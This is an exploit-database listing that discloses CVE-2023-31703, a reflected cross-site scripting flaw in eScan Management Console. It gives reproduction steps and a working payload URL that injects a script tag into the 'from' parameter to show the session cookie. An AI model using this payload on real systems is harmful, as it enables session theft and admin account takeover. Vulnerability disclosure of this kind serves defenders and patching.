Exploit for eScan Management Console 14.0.1400.2281 Cross Site Scripting CVE-2023-31703

Name: Exploit for eScan Management Console 14.0.1400.2281 Cross Site Scripting CVE-2023-31703
Rating: 5 (123 reviews)

2023-05-24 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:172540
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting  
# Date: 2023-05-16  
# Exploit Author: Sahil Ojha  
# Vendor Homepage: https://www.escanav.com  
# Software Link: https://cl.escanav.com/ewconsole.dll  
# Version: 14.0.1400.2281  
# Tested on: Windows  
# CVE : CVE-2023-31703  
  
*Step of Reproduction/ Proof of Concept(POC)*  
  
1. Login into the eScan Management Console with a valid user credential.  
2. Navigate to URL:  
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=  
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as  
shown below and a valid XSS pop up appeared.  
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=  
4. By exploiting this vulnerability, any arbitrary attacker could have  
stolen an admin user session cookie to perform account takeover.